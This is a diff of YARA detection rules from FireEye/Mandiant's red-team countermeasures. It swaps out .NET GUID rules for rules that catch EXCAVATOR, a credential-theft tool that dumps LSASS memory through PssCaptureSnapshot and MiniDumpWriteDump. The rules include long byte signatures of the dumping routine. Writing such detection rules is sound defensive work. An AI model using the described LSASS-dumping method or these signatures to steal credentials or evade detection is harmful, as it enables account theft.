6F CA 66 0F EF C8 F3 0F 7F 48 ?? 66 0F 6F CA F3 0F 6F 40 ?? 66 0F EF C8 F3 0F 7F 48 ?? 66 0F 6F CA F3 0F 6F 40 ?? 66 0F EF C8 F3 0F 7F 48 ?? F3 0F 6F 40 ?? 66 0F EF C2 F3 0F 7F 40 ?? 48 83 E9 01 75 ?? FF 15 ?? ?? ?? ?? 4C 8D 44 24 ?? BA 0A 00 00 00 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 45 ?? 41 B9 02 00 00 00 48 89 44 24 ?? 45 33 C0 C7 44 24 ?? 02 00 00 00 41 8D 51 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 ?? 33 C9 41 8D 50 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B 44 24 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 ?? 48 8B C8 41 8D 50 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 ?? 4C 8D 4C 24 ?? 4C 89 74 24 ?? 33 D2 41 B8 00 00 02 00 48 C7 44 24 ?? 08 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 45 ?? 48 89 44 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 45 ?? 48 89 7D ?? 48 89 44 24 ?? 45 33 C9 4C 89 74 24 ?? 33 D2 4C 89 74 24 ?? C7 44 24 ?? 04 00 08 00 44 89 74 24 ?? 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 8B 5D ?? FF 15 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 44 8B C3 33 D2 B9 3A 04 00 00 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA FF FF FF FF 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF 15 ?? ?? ?? ?? 33 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 4D ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 73 ?? 49 8B 7B ?? 4D 8B 73 ?? 49 8B E3 5D C3 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and any of ( $bytes* )
 }
-rule FIREEYE_RT_Builder_MSIL_Sharpgenerator_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_Win64_EXCAVATOR_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpGenerator' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "ab661cba-f695-59d2-9071-9b9a90233457"
-		date = "2020-12-08"
+		id = "e593b589-747d-53c2-a39a-57485e4f7641"
+		date = "2020-11-30"
+		date = "2020-11-30"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPGENERATOR/production/yara/Builder_MSIL_SharpGenerator_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/APT_HackTool_Win64_EXCAVATOR_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "6dc0780e54d33df733aadc8a89077232baa63bf1cbe47c5d164c57ce3185dd71"
+		hash = "6a9a114928554c26675884eeb40cc01b"
+		logic_hash = "aa06628ddef0f95c4217b97a3476a0ee12e00d04c4827a512730598f3c80f1f6"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$typelibguid0 = "3f450977-d796-4016-bb78-c9e91c6a0f08" ascii nocase wide
+		$api1 = "PssCaptureSnapshot" fullword
+		$api2 = "MiniDumpWriteDump" fullword
+		$dump = { BA FD 03 00 AC [0-8] 41 B8 1F 00 10 00 48 8B ?? FF 15 [4] 85 C0 0F 85 [2] 00 00 [0-2] 48 8D 05 [5] 89 ?? 24 30 ( C7 44 24 28 80 00 00 00 48 8D 0D ?? ?? ?? ?? | 48 8D 0D ?? ?? ?? ?? C7 44 24 28 80 00 00 00 ) 45 33 C9 [0-5] 45 33 C0 C7 44 24 20 01 00 00 00 BA 00 00 00 10 [0-10] FF 15 [4] 48 8B ?? 48 83 F8 FF ( 74 | 0F 84 ) [1-4] 48 8B 4C 24 ?? 48 8D 44 24 ?? 48 89 44 24 30 ( 41 B9 02 00 00 00 | 44 8D 4D 02 ) ?? 89 ?? 24 28 4C 8B ?? 8B [2] 89 ?? 24 20 FF 15 [4] 48 8B ?? FF 15 [4] 48 8B ?? FF 15 [4] FF 15 [4] 48 8B 54 24 ?? 48 8B C8 FF 15 }
+		$lsass = { 6C 73 61 73 [6] 73 2E 65 78 [6] 65 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
 }
-rule FIREEYE_RT_MSIL_Launcher_DUEDLLIGENCE_1 : FILE
+rule FIREEYE_RT_Credtheft_Win_EXCAVATOR_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'DUEDLLIGENCE' project."
+		description = "This rule looks for the binary signature of the routine that calls PssFreeSnapshot found in the Excavator-Reflector DLL."
 		author = "FireEye"
-		id = "86f0ebe5-110b-53e2-bba5-676f00c2cddd"
+		id = "89037b9a-78b0-5a8c-bb60-3d54842d81e1"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/MSIL_Launcher_DUEDLLIGENCE_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/CredTheft_Win_EXCAVATOR_2.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "a91bf61cc18705be2288a0f6f125068f"
-		logic_hash = "bd6abaa909f0c776d81ed1115e875888336661c91df3881f4f3ea5dd27e115f8"
+		hash = "6a9a114928554c26675884eeb40cc01b"
+		logic_hash = "408e8862f0c470105648fdba00dc5531ffcd739fa544f89acb70f0fa1b105c03"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$typelibguid0 = "73948912-cebd-48ed-85e2-85fcd1d4f560" ascii nocase wide
+		$bytes1 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A0 01 00 00 48 8B 05 4C 4A 01 00 48 33 C4 48 89 85 90 00 00 00 BA 50 00 00 00 C7 05 CB 65 01 00 43 00 3A 00 66 89 15 EC 65 01 00 4C 8D 44 24 68 48 8D 15 D8 68 01 00 C7 05 B2 65 01 00 5C 00 57 00 33 C9 C7 05 AA 65 01 00 69 00 6E 00 C7 05 A4 65 01 00 64 00 6F 00 C7 05 9E 65 01 00 77 00 73 00 C7 05 98 65 01 00 5C 00 4D 00 C7 05 92 65 01 00 45 00 4D 00 C7 05 8C 65 01 00 4F 00 52 00 C7 05 86 65 01 00 59 00 2E 00 C7 05 80 65 01 00 44 00 4D 00 C7 05 72 68 01 00 53 00 65 00 C7 05 6C 68 01 00 44 00 65 00 C7 05 66 68 01 00 42 00 75 00 C7 05 60 68 01 00 47 00 50 00 C7 05 5A 68 01 00 72 00 69 00 C7 05 54 68 01 00 56 00 69 00 C7 05 4E 68 01 00 4C 00 45 00 C7 05 48 68 01 00 67 00 65 00 C7 05 12 67 01 00 6C 73 61 73 C7 05 0C 67 01 00 73 2E 65 78 C6 05 09 67 01 00 65 FF 15 63 B9 00 00 45 33 F6 85 C0 74 66 48 8B 44 24 68 48 89 44 24 74 C7 44 24 70 01 00 00 00 C7 44 24 7C 02 00 00 00 FF 15 A4 B9 00 00 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF 15 1A B9 00 00 85 C0 74 30 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF 15 EF B8 00 00 FF 15 11 B9 00 00 48 8B 4C 24 48 FF 15 16 B9 00 00 48 89 9C 24 B0 01 00 00 48 8D 0D BF 2E 01 00 48 89 B4 24 B8 01 00 00 4C 89 74 24 40 FF 15 1C B9 00 00 48 85 C0 0F 84 B0 00 00 00 48 8D 15 AC 2E 01 00 48 8B C8 FF 15 1B B9 00 00 48 8B D8 48 85 C0 0F 84 94 00 00 00 33 D2 48 8D 4D 80 41 B8 04 01 00 00 E8 06 15 00 00 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 63 66 0F 1F 44 00 00 48 8B 4C 24 40 4C 8D 45 80 41 B9 04 01 00 00 33 D2 FF 15 89 B8 00 00 48 8D 15 F2 65 01 00 48 8D 4D 80 E8 49 0F 00 00 48 85 C0 75 38 33 D2 48 8D 4D 80 41 B8 04 01 00 00 E8 A3 14 00 00 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 A3 33 C0 E9 F5 00 00 00 48 8B 5C 24 40 48 8B CB FF 15 5E B8 00 00 8B F0 48 85 DB 74 E4 85 C0 74 E0 4C 8D 4C 24 50 48 89 BC 24 C0 01 00 00 BA FD 03 00 AC 41 B8 1F 00 10 00 48 8B CB FF 15 12 B8 00 00 85 C0 0F 85 A0 00 00 00 48 8D 05 43 FD FF FF 4C 89 74 24 30 C7 44 24 28 80 00 00 00 48 8D 0D 3F 63 01 00 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 20 01 00 00 00 BA 00 00 00 10 4C 89 74 24 60 FF 15 E4 B7 00 00 48 8B F8 48 83 F8 FF 74 59 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 00 00 00 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF 15 B1 B9 00 00 48 8B CB FF 15 78 B7 00 00 48 8B CF FF 15 6F B7 00 00 FF 15 B1 B7 00 00 48 8B 54 24 50 48 8B C8 FF 15 53 B7 00 00 33 C9 FF 15 63 B7 00 00 CC 48 8B CB FF 15 49 B7 00 00 48 8B BC 24 C0 01 00 00 33 C0 48 8B B4 24 B8 01 00 00 48 8B 9C 24 B0 01 00 00 48 8B 8D 90 00 00 00 48 33 CC E8 28 00 00 00 4C 8B B4 24 C8 01 00 00 48 81 C4 A0 01 00 00 5D C3 }
+		$bytes2 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 85 9? ?? ?? ?0 BA ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 89 ?? ?? ?? ?? ?? 4C 8D 44 24 68 48 ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 68 48 89 44 24 74 C7 44 24 7? ?1 ?? ?? ?? C7 44 24 7C 02 ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 4C 24 48 FF ?? ?? ?? ?? ?? 48 89 9C 24 B? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 B4 24 B8 01 ?? ?? 4C 89 74 24 40 FF ?? ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 0F 1F 44 ?? ?? 48 8B 4C 24 40 4C 8D 45 80 41 ?? ?? ?? ?? ?? 33 D2 FF ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8D 4D 80 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 40 48 8B CB FF ?? ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 50 48 89 BC 24 C? ?1 ?? ?? BA ?? ?? ?? ?? 41 ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 30 C7 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 2? ?1 ?? ?? ?? BA ?? ?? ?? ?? 4C 89 74 24 60 FF ?? ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 ?? ?? ?? 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 54 24 50 48 8B C8 FF ?? ?? ?? ?? ?? 33 C9 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B BC 24 C? ?1 ?? ?? 33 C0 48 8B B4 24 B8 01 ?? ?? 48 8B 9C 24 B? ?1 ?? ?? 48 8B 8D 9? ?? ?? ?0 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 C8 01 ?? ?? 48 81 C4 A? ?1 ?? ?? 5D C3 }
+		$bytes3 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 85 9? ?? ?? ?0 BA ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 89 ?? ?? ?? ?? ?? 4C 8D 44 24 68 48 ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 68 48 89 44 24 74 C7 44 24 7? ?1 ?? ?? ?? C7 44 24 7C 02 ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 4C 24 48 FF ?? ?? ?? ?? ?? 48 89 9C 24 B? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 B4 24 B8 01 ?? ?? 4C 89 74 24 40 FF ?? ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 0F 1F 44 ?? ?? 48 8B 4C 24 40 4C 8D 45 80 41 ?? ?? ?? ?? ?? 33 D2 FF ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8D 4D 80 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 40 48 8B CB FF ?? ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 50 48 89 BC 24 C? ?1 ?? ?? BA ?? ?? ?? ?? 41 ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 30 C7 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 2? ?1 ?? ?? ?? BA ?? ?? ?? ?? 4C 89 74 24 60 FF ?? ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 ?? ?? ?? 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 54 24 50 48 8B C8 FF ?? ?? ?? ?? ?? 33 C9 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B BC 24 C? ?1 ?? ?? 33 C0 48 8B B4 24 B8 01 ?? ?? 48 8B 9C 24 B? ?1 ?? ?? 48 8B 8D 9? ?? ?? ?0 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 C8 01 ?? ?? 48 81 C4 A? ?1 ?? ?? 5D C3 }
+		$bytes4 = { 4C 89 74 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC A0 01 00 00 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? BA 50 00 00 00 C7 05 ?? ?? ?? ?? 43 00 3A 00 66 89 15 ?? ?? 01 00 4C 8D 44 24 ?? 48 8D 15 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 5C 00 57 00 33 C9 C7 05 ?? ?? ?? ?? 69 00 6E 00 C7 05 ?? ?? ?? ?? 64 00 6F 00 C7 05 ?? ?? ?? ?? 77 00 73 00 C7 05 ?? ?? ?? ?? 5C 00 4D 00 C7 05 ?? ?? ?? ?? 45 00 4D 00 C7 05 ?? ?? ?? ?? 4F 00 52 00 C7 05 ?? ?? ?? ?? 59 00 2E 00 C7 05 ?? ?? ?? ?? 44 00 4D 00 C7 05 ?? ?? ?? ?? 53 00 65 00 C7 05 ?? ?? ?? ?? 44 00 65 00 C7 05 ?? ?? ?? ?? 42 00 75 00 C7 05 ?? ?? ?? ?? 47 00 50 00 C7 05 ?? ?? ?? ?? 72 00 69 00 C7 05 ?? ?? ?? ?? 56 00 69 00 C7 05 ?? ?? ?? ?? 4C 00 45 00 C7 05 ?? ?? ?? ?? 67 00 65 00 C7 05 ?? ?? ?? ?? 6C 73 61 73 C7 05 ?? ?? ?? ?? 73 2E 65 78 C6 05 ?? ?? ?? ?? 65 FF 15 ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 ?? 48 89 44 24 ?? C7 44 24 ?? 01 00 00 00 C7 44 24 ?? 02 00 00 00 FF 15 ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 ?? 41 8D 56 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 44 24 ?? 4C 89 74 24 ?? 45 33 C9 33 D2 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D ?? 41 B8 04 01 00 00 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 ?? 66 0F 1F 44 00 ?? 48 8B 4C 24 ?? 4C 8D 45 ?? 41 B9 04 01 00 00 33 D2 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D ?? 41 B8 04 01 00 00 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 ?? 48 89 BC 24 ?? ?? ?? ?? BA FD 03 00 AC 41 B8 1F 00 10 00 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 4C 89 74 24 ?? C7 44 24 ?? 80 00 00 00 48 8D 0D ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 C7 44 24 ?? 01 00 00 00 BA 00 00 00 10 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 48 89 44 24 ?? 41 B9 02 00 00 00 4C 89 74 24 ?? 4C 8B C7 8B D6 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B C8 FF 15 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? CC 48 8B CB FF 15 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 33 C0 48 8B B4 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 48 81 C4 A0 01 00 00 5D C3 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and any of ( $bytes* )
 }
-rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_2 : FILE
+rule FIREEYE_RT_APT_Hacktool_Win64_EXCAVATOR_2 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "b10b476a-0d38-53e4-80cf-559618729268"
-		date = "2020-12-18"
-		modified = "2020-12-18"
+		id = "4b7640e8-5621-5cc3-8ac9-84347f23f5eb"
+		date = "2020-12-02"
+		date = "2020-12-02"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_2.yar#L5-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/APT_HackTool_Win64_EXCAVATOR_2.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "5a2e0559e3b47c1957a42929fbbeba7a53c21619125381b01dcd8453b6ec4802"
+		hash = "4fd62068e591cbd6f413e1c2b8f75442"
+		logic_hash = "14263c17323cd78df10f7f101bd7a9c74f7818b34a2e42125d45205067399381"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		rev = 1
 
 	strings:
-		$1 = "DueDLLigence" fullword
-		$2 = "CPlApplet" fullword
-		$iz1 = /_Cor(Exe|Dll)Main/ fullword
+		$api1 = "PssCaptureSnapshot" fullword
+		$api2 = "MiniDumpWriteDump" fullword
